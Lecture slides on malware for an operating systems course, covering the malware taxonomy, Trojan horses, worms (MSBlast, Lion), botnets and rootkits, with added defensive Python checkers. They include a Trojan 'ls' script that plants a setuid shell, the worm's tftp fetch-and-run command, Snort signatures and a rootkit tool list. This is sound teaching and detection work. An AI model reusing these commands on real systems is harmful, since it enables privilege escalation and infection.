Operating Systems Principles

Academic year: 2021


(1)

Malware

CSC501

(2)

A Quick Recap

- Previous Lecture
  - Code Injection Attacks
- Today:
  - Malware

(3)

What is Malicious Software?

- Malicious Software (a.k.a. Malware)
  - Software designed to infiltrate or damage a computer system, without the owner's informed consent
    -- http://en.wikipedia.org/wiki/Malware
  - Examples:
    - Viruses, worms, Trojan horses, spyware, and other malicious and unwanted software
  - How about adware?
- Malware references the intent of the creator, rather than any particular features

(4)

Why should we care?

- Malware remains a top threat

[Figure: Blaster, Nimda, CodeRed. Source: Symantec Internet Security Threat Report]

[Figure: Conficker Worm Infection Map (as of 4/1/09) from CWG]

(5)

- Recruiting Vulnerable Nodes -> Attack Network
  - Zero-day exploits w/o software patches
  - New attack strategies
    - Exploiting vulnerable client-side software, such as IE
    - Propagating malware with RFID tags, cell phones...
  - Fast massive replications
- Providing "Value-Added" Services
  - DDoS, spamming, or other malicious purposes ...
  - Sell/rent attack networks for profit

(6)

Taxonomy of Malicious Software

[Figure: Malicious Programs, divided into Needs Host Program (backdoors, Logic Bombs, Trojan Horses, Viruses) and Independent (Worms, Zombies); Viruses and Worms are the ones that Replicate; Rootkits also appear in the diagram]

(7)

Backdoor

- Secret entry point into a system
  - Specific user identifier or password that circumvents normal security procedures.
- Commonly used by developers

(8)

Logic Bomb

- Embedded in legitimate programs
- Activated when specified conditions are met
  - E.g., presence/absence of some file; particular date/time or particular user
- When triggered, typically damages system

(9)

Trojan Horse

- Attacker:

    cat >/homes/victim/ls <<eof
    cp /bin/sh /tmp/.xxsh
    chmod u+s,o+x /tmp/.xxsh
    rm ./ls
    ls $*
    eof

- Victim:

    ls

- Program with an expected and hidden effect
  - Appears normal/expected
  - Hidden effect violates security policy
- User tricked into executing Trojan horse
  - Expects (and sees) expected behavior
  - Hidden effect performed
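A defender's view of the scenario above, as an added example (not the lecture's code): why the planted ./ls is found before the real one, and what the hidden effect leaves behind. It flags PATH entries that search the current directory or a world-writable directory, resolves which `ls` a given PATH would run, and lists setuid files under a directory; the layout built by demo() is constructed in a temporary directory.

```python
import os
import stat
import tempfile


def path_risks(path_value):
    # PATH entries an attacker can drop a Trojan into; an empty entry means '.'
    risks = []
    for entry in path_value.split(os.pathsep):
        if entry in ("", "."):
            risks.append((entry, "current directory searched"))
        elif os.path.isdir(entry) and os.stat(entry).st_mode & stat.S_IWOTH:
            risks.append((entry, "world-writable directory"))
    return risks


def resolve_command(name, path_value, cwd):
    # The file the shell would execute for `name` under this PATH, cwd applied
    for entry in path_value.split(os.pathsep):
        candidate = os.path.normpath(os.path.join(cwd, entry, name))
        if os.path.isfile(candidate) and os.stat(candidate).st_mode & stat.S_IXUSR:
            return candidate
    return None


def find_setuid(directory):
    # Regular files carrying the setuid bit: the trace /tmp/.xxsh leaves behind
    return sorted(os.path.join(root, name) for root, _, names in os.walk(directory)
                  for name in names if os.lstat(os.path.join(root, name)).st_mode & stat.S_ISUID)


def demo():
    # Constructed layout: home/ls (planted), bin/ls (genuine), tmp/.xxsh (setuid)
    with tempfile.TemporaryDirectory() as base:
        home, bin_dir, tmp = (os.path.join(base, d) for d in ("home", "bin", "tmp"))
        planted, genuine, hidden = (os.path.join(home, "ls"), os.path.join(bin_dir, "ls"),
                                    os.path.join(tmp, ".xxsh"))
        for d, mode in ((home, 0o755), (bin_dir, 0o755), (tmp, 0o1777)):
            os.mkdir(d)
            os.chmod(d, mode)                            # tmp: sticky + world-writable
        for path, mode in ((planted, 0o755), (genuine, 0o755), (hidden, 0o4755)):
            with open(path, "w") as f:
                f.write("#!/bin/sh\n")                   # inert stand-ins, never executed
            os.chmod(path, mode)                         # 0o4755 is what chmod u+s leaves
        unsafe = os.pathsep.join([".", tmp, bin_dir])
        return {"risks": [why for _, why in path_risks(unsafe)],
                "unsafe_runs_planted": resolve_command("ls", unsafe, home) == planted,
                "safe_runs_genuine": resolve_command("ls", bin_dir, home) == genuine,
                "setuid_in_tmp": [os.path.basename(p) for p in find_setuid(tmp)]}
```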

(10)

Virus

- Self-replicating code
  - Alters normal code with “infected” version
  - Generally tries to remain undetected
- Operates when infected code executed

    If spread condition then
        For target files
            if not infected then alter to include virus
    Perform malicious action

(11)

Worm

- Runs independently
  - Does not require a host program
- Propagates a fully working version of itself to other machines
- Carries a payload performing hidden tasks
  - Backdoors, spam relays, DDoS agents; ...
- Phases

(12)

Worm Propagation

[Figure: A Worm -> A Victim]

1: Target Probing
2: Vulnerability Exploitation
3: Replication

(13)

MSBlast Worm (Aug., 2003)

[Figure: Blaster (192.168.0.1) -> Target/RPC (192.168.10.11)]

1. Exploits target on port 135/TCP
2. Binds svchost.exe to port 4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates a shell “cmd.exe” and binds it to port 4444/TCP
5. Creates “TFTP Server” on port 69/UDP
6. Sends “TFTP” command to shell
7. Runs TFTP command; “teleports” msblast.exe file
8. Sends “START msblast.exe” command
9. Runs worm on target!
10. Closes connection

    >tftp -I 192.168.0.1 GET msblast.exe

11. Shell closes

Snort signature:

    alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)

(14)

Example II : Lion/Linux Worm

[Figure: Lion (192.168.0.1) -> Target/BIND (192.168.10.11)]

1. Checks reach-ability by connecting 53/TCP
2. Exploit target on port 53/TCP
3. Runs a shell command
4. Runs worm on target!
3. Replicate worms on port 27374/TCP

Snort signatures:

    alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named tsig overflow attempt"; flow:to_server,established; content:"|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61|"; reference:cve,CVE-2001-0010; …)

    alert tcp $HOME_NET any -> $EXTERNAL_NET 27374 (msg:"MISC Lion worm"; flow:to_server,established; content:"GET "; depth:8; nocase; sid:514;…)
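The content:"|...|" patterns in these rules are the bytes the IDS looks for in the packet payload. As an added example (not from the lecture), a minimal matcher for the Snort content, depth and nocase options used in the Blaster and Lion rules above, run over constructed payloads; the two rule strings are shortened copies of the slides' rules with the elided trailing options dropped.

```python
# Shortened copies of the two rules on the slides, with the elided trailing options dropped
BLASTER_RULE = ('alert ip $EXTERNAL_NET any -> $HOME_NET 135 '
                '(msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 '
                '94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |";)')
LION_RULE = ('alert tcp $HOME_NET any -> $EXTERNAL_NET 27374 (msg:"MISC Lion worm"; '
             'flow:to_server,established; content:"GET "; depth:8; nocase; sid:514;)')

def decode_content(spec):
    # Snort content syntax: plain text is literal, |..| sections are hex bytes
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        out.extend(bytes.fromhex(part) if i % 2 else part.encode("latin-1"))
    return bytes(out)

def parse_rule(rule):
    # Keep the header and only the options this matcher understands
    header, _, options = rule.partition("(")
    sig = {"header": header.strip(), "msg": "", "content": b"", "depth": 0, "nocase": False}
    for opt in options.rstrip(")").split(";"):
        key, _, value = opt.strip().partition(":")
        if key == "msg":
            sig["msg"] = value.strip('"')
        elif key == "content":
            sig["content"] = decode_content(value.strip('"'))
        elif key == "depth":
            sig["depth"] = int(value)          # search only the first N payload bytes
        elif key == "nocase":
            sig["nocase"] = True
    return sig

def matches(sig, payload):
    # depth bounds the search window; nocase makes the comparison case-insensitive
    window = payload[: sig["depth"]] if sig["depth"] else payload
    pattern = sig["content"]
    if sig["nocase"]:
        window, pattern = window.lower(), pattern.lower()
    return pattern in window

def scan(rule, payload):
    return matches(parse_rule(rule), payload)

if __name__ == "__main__":
    blaster_bytes = parse_rule(BLASTER_RULE)["content"]    # the 28-byte DCOM signature
    for rule, payload in ((BLASTER_RULE, b"\x00" * 40 + blaster_bytes),   # constructed payloads
                          (LION_RULE, b"get / HTTP/1.0\r\n"),             # nocase catches it
                          (LION_RULE, b"\x00" * 6 + b"GET / HTTP/1.0")):  # GET starts past depth:8
        print(parse_rule(rule)["msg"], scan(rule, payload))
```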

(15)

(16)

Zombie

- Secretly takes over another networked computer by exploiting software flaws
- Builds the compromised computers into a zombie network or botnet
- Uses it to indirectly launch attacks

(17)

Detailed Steps (1)

[Figure: Attacker, Unsecured Computers]

1. Attacker scans Internet for unsecured systems that can be compromised

(18)

Detailed Steps (2)

[Figure: Attacker, Internet, Unsecured Computers -> Zombies]

2. Attacker secretly installs zombie agent programs, turning unsecured computers into zombies

(19)

Detailed Steps (3)

[Figure: Attacker, Internet, Zombies, Master Server]

3. Zombie agents "phone home" and connect to a master server

(20)

Detailed Steps (4)

[Figure: Attacker, Internet, Zombies, Master Server]

4. Attacker sends commands to Master Server to launch a DDoS attack against a targeted system

(21)

Detailed Steps (5)

[Figure: Attacker, Internet, Zombies, Master Server, Targeted System]

5. Master Server sends signal to zombies to launch attack on targeted system

(22)

Detailed Steps (6)

[Figure: Attacker, Internet, Zombies, Master Server, Targeted System; User Request Denied]

6. Targeted system is overwhelmed by zombie requests, denying requests from normal users

(23)

Rootkit

- “A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer”
- Goals:
  - Hide malicious resources (e.g., processes, files, registry keys, open ports, etc.)

(24)

[Banner: Linux RootKit III]

ls          Trojaned! Hide files
du          Trojaned! Hide files
ifconfig    Trojaned! Hide sniffing
netstat     Trojaned! Hide connections
chfn        Trojaned! User->r00t
chsh        Trojaned! User->r00t
inetd       Trojaned! Remote access
login       Trojaned! Remote access
passwd      Trojaned! User->r00t
ps          Trojaned! Hide processes
top         Trojaned! Hide processes
rshd        Trojaned! Remote access
syslogd     Trojaned! Hide logs
linsniffer  Packet sniffer!
fix         File fixer!
z2          Zap2 utmp/wtmp/lastlog eraser!
wted        wtmp/utmp editor!
lled        lastlog editor!
bindshell   port/shell type daemon!

(25)

Rootkit

- Simple rootkits:
  - Modify user programs (ls, ps)
  - Detectable by tools like Tripwire
- Sophisticated rootkits:
  - Modify the kernel itself
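How a Tripwire-style check catches the simple rootkits described above, as an added example (not the lecture's or Tripwire's own code): record a baseline of file hashes, modes and sizes, then report modified, added and removed files. demo() builds a constructed stand-in for /bin in a temporary directory and replaces its ls and adds a hidden file, the way the LRK listing on the previous slide would.

```python
import hashlib
import os
import tempfile


def hash_file(path):
    # SHA-256 of the file contents, read in chunks; mtime is not used because it is trivially reset
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(directory):
    # relative path -> (sha256, mode, size) for every regular file below directory
    snap = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            st = os.lstat(full)
            snap[os.path.relpath(full, directory)] = (hash_file(full), st.st_mode, st.st_size)
    return snap


def compare(old, new):
    # A trojaned ls shows up as 'modified'; a dropped sniffer or editor as 'added'
    return {"modified": sorted(p for p in old if p in new and old[p] != new[p]),
            "added": sorted(set(new) - set(old)),
            "removed": sorted(set(old) - set(new))}


def demo():
    # Constructed /bin stand-in: baseline, then tamper the way a user-level rootkit does
    with tempfile.TemporaryDirectory() as bindir:
        for name in ("ls", "ps", "netstat"):
            with open(os.path.join(bindir, name), "wb") as f:
                f.write(b"genuine " + name.encode())     # placeholder program bodies
        before = baseline(bindir)
        with open(os.path.join(bindir, "ls"), "wb") as f:
            f.write(b"trojaned ls")                      # replacement ls that would hide files
        with open(os.path.join(bindir, ".sniffer"), "wb") as f:
            f.write(b"linsniffer")                       # extra tool left next to the binaries
        return compare(before, baseline(bindir))


if __name__ == "__main__":
    print(demo())
```

A checker that runs on the compromised host trusts the kernel that reads the files for it, which is exactly where the kernel-level and under-kernel rootkits on the following slides sit; the baseline and the checker itself belong on read-only or offline media.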

(26)

Rootkit Classification

[Figure: three user/kernel stacks]

Application-level Rootkit (I): Kernel unchanged; Trojan login, Trojan ps, Trojan ifconfig, good tripwire
Application-level Rootkit (II): Kernel unchanged; good login, good ps, good ifconfig, good tripwire, plus an Evil Program running alongside the good programs
Kernel-level RootKit: Trojan Kernel Module inside the Kernel; good login, good ps, good ifconfig, good tripwire on top

Examples named on the slide: Shadow Walker, adore (kernel-level); Hxdef, NTIllusion (application-level)

(27)

Rootkit Classification

Under-Kernel RootKit: Evil VMM beneath the Kernel; good login, good ps, good ifconfig, good tripwire on top

(28)

Next Lecture

References
